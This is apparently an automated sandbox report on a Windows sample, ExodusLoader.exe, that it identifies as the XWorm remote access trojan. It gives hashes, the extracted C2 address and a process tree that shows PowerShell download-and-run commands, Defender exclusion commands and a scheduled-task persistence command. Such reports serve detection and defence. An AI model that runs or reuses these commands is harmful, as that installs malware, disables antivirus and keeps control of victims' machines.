Overview

overview

10

Static

static

3

ExodusLoader.exe

windows10-ltsc 2021-x64

10

Resubmissions

07/03/2025, 23:38

250307-3m5aeazk13 10

Analysis

  • max time kernel
    19s
  • max time network
    20s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250218-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07/03/2025, 23:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ExodusLoader.exe

  • Size

    89KB

  • MD5

    2f3405fa61bec944ed9d869adb6a37e3

  • SHA1

    4a3c839b899809ba89a99eaadecf4da6d71e8256

  • SHA256

    ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

  • SHA512

    72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0

  • SSDEEP

    1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    System.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8B48.tmp\8B59.tmp\8B5A.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4004
      • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
        "C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1576
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC66D.tmp.bat""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Windows\system32\timeout.exe
            timeout 3
            5⤵
            • Delays execution with timeout.exe
            PID:2172
      • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
        "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
        3⤵
        • Executes dropped EXE
        PID:3528
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2160
  • C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
    "C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3236
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    ed30ca9187bf5593affb3dc9276309a6

    SHA1

    c63757897a6c43a44102b221fe8dc36355e99359

    SHA256

    81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

    SHA512

    1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    92fb7b0beaaa157dcb80a4198a22ca8c

    SHA1

    aef203c6f9e107d095f7217423b9a05c7d7ef5c1

    SHA256

    299853c88a41d76036493faf624f3dc0b97a55922d9bc8e356e4061602c58d71

    SHA512

    5575d75c4ca61a5f6d5da70f82cc744cc7fdb6cb1d40aca673844204097de3ed837b6013066d2a25bd385f0ccd1b63f3bd4e32018a4d50eb998c943b3d42be1b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    0c9b72a598bfedc7a5579c923f4e4655

    SHA1

    d5a2ca87954e4c229d0f00953e34017772bfb895

    SHA256

    1e8775bf6968b85b495bc1b9fabe7302d0273cae1b69762dc48fc441df40b2a8

    SHA512

    389ffc0e4125829d4b4c1f1ca19ba257055cba2ff6d823680c002cf71bb204df51acb0154e612b40d8ccb3af18d88944e8159e4f4b9dcf10d383310595beb176

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    aa48d9dc018b70f8b809369223b04c30

    SHA1

    e2cf63b9f7b3456f9b4673379723b7ada094a1cb

    SHA256

    a048ac8756024fa6e79161629da1579ec572502eb0c9ecc2b1419856051eec4c

    SHA512

    5008401648bf8d3788d501f61e41c72974b83fed087d8d1162cb06c4e6069899694ba58f5f76bd899d2055f06a5c255769f2183b0632fdb313b19da3588678f6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\8B48.tmp\8B59.tmp\8B5A.bat
    Filesize

    491B

    MD5

    54436d8e8995d677f8732385734718bc

    SHA1

    246137700bee34238352177b56fa1c0f674a6d0b

    SHA256

    20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

    SHA512

    57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    Filesize

    507KB

    MD5

    470ccdab5d7da8aafc11490e4c71e612

    SHA1

    bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

    SHA256

    849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

    SHA512

    6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
    Filesize

    227KB

    MD5

    38b7704d2b199559ada166401f1d51c1

    SHA1

    3376eec35cd4616ba8127b976a8667e7a0aac87d

    SHA256

    153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

    SHA512

    07b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbvv3424.05g.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpC66D.tmp.bat
    Filesize

    164B

    MD5

    7d650e8761e071d8969b750b25d1a622

    SHA1

    2c3367f30db576f025560fd8c33f7622870f0ce6

    SHA256

    1e37717f0364222899d7e1d96be72d7bce1eb41f85dd727d51a253d0630f872e

    SHA512

    99211151584568f037e99065083bfc9f0f78a2d85fb13b514438b32de9287e318b77c869f79d01b0742437c9e0cd5c474884153b1cf731e3a4dbf4d6da8fd4af

    Download Submit

  • memory/3236-72-0x0000000002A50000-0x0000000002A5E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3272-41-0x0000000000B70000-0x0000000000BB0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/3604-14-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3604-19-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3604-15-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3604-13-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3604-3-0x000001BFFFFA0000-0x000001BFFFFC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3604-2-0x00007FF811963000-0x00007FF811965000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4004-33-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4004-36-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4004-32-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4004-31-0x00007FF811960000-0x00007FF812422000-memory.dmp

    Filesize

    10.8MB

    Download